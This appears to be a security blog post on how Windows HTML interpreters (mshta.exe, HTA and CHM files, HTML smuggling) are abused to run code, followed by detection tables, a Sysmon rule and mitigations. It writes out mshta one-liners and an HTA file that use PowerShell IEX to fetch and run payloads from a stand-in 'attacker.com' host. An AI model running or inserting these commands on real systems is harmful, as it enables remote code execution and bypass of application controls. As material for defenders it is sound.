Microsoft Tools & Hacks

Hide Malware Using Microsoft HTML Interpreters

admin

Introduction

Microsoft provides several HTML rendering engines and interpreters as part of the Windows operating system. Attackers have discovered that these legitimate tools can be weaponized to execute malicious code while bypassing many security controls.

MSHTA.exe (Microsoft HTML Application Host)

Overview

mshta.exe is a legitimate Windows utility that executes Microsoft HTML Applications (HTA files). HTA files have the same capabilities as Internet Explorer but run as "fully trusted" applications with access to the file system, registry, and other system resources.

Attack Capabilities

MSHTA can execute: - Local HTA files - Remote HTA files via URL - Inline VBScript or JavaScript

# Execute remote HTA
mshta.exe http://attacker.com/payload.hta

# Inline VBScript execution
mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -ep bypass"":close")

# Inline JavaScript
mshta.exe javascript:a=(GetObject("script:http://attacker.com/payload.sct"));close();

Why It's Effective

  • Signed by Microsoft: mshta.exe is a trusted, signed binary
  • Present on all Windows: Available on every Windows installation
  • Bypasses AppLocker: Default AppLocker rules allow mshta.exe execution
  • No file on disk: Inline scripts leave minimal forensic artifacts

Other HTML-Based Attack Vectors

HTA Files

HTML Applications (.hta) can contain full-featured scripts:

<html>
<head>
<script language="VBScript">
Sub Window_onLoad
    Set shell = CreateObject("Wscript.Shell")
    shell.Run "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/ps.ps1')"
    self.close
End Sub
</script>
</head>
<body></body>
</html>

Compiled HTML Help Files (.chm)

Windows Help files can contain embedded scripts: - Use hhc.exe to compile HTML into CHM format - Scripts execute when the help file is opened - Can be distributed via email attachments - Often bypass email security filters

HTML Smuggling

A technique where the malicious payload is constructed client-side: - JavaScript assembles binary data from encoded strings - Creates a Blob object and triggers download - Bypasses network-level inspection - Used by Nobelium (SolarWinds attackers) and other APTs

Detection Strategies

Process Monitoring

Key indicators to watch for:

Parent Process Child Process Severity
mshta.exe powershell.exe Critical
mshta.exe cmd.exe Critical
mshta.exe wscript.exe High
mshta.exe cscript.exe High
mshta.exe regsvr32.exe Critical

Network Monitoring

  • Monitor mshta.exe network connections
  • Block HTA downloads at the proxy level
  • Inspect URLs accessed by mshta.exe

Sysmon Configuration

<RuleGroup name="MSHTA Monitoring" groupRelation="or">
    <ProcessCreate onmatch="include">
        <ParentImage condition="contains">mshta.exe</ParentImage>
    </ProcessCreate>
    <NetworkConnect onmatch="include">
        <Image condition="contains">mshta.exe</Image>
    </NetworkConnect>
</RuleGroup>

Mitigation

  1. Block mshta.exe: Use AppLocker or WDAC to prevent execution where not needed
  2. Disable HTA file associations: Remove .hta file type associations
  3. Email filtering: Block HTA, CHM, and HTML attachments with embedded scripts
  4. Proxy restrictions: Block mshta.exe from making outbound connections
  5. Windows Defender ASR: Enable "Block execution of potentially obfuscated scripts" rule

Conclusion

Microsoft's HTML interpreters represent a significant attack surface that is often overlooked by security teams. Understanding how these tools can be abused is essential for building effective defensive strategies.

Hack Malware Microsoft Tools
Related

Related Research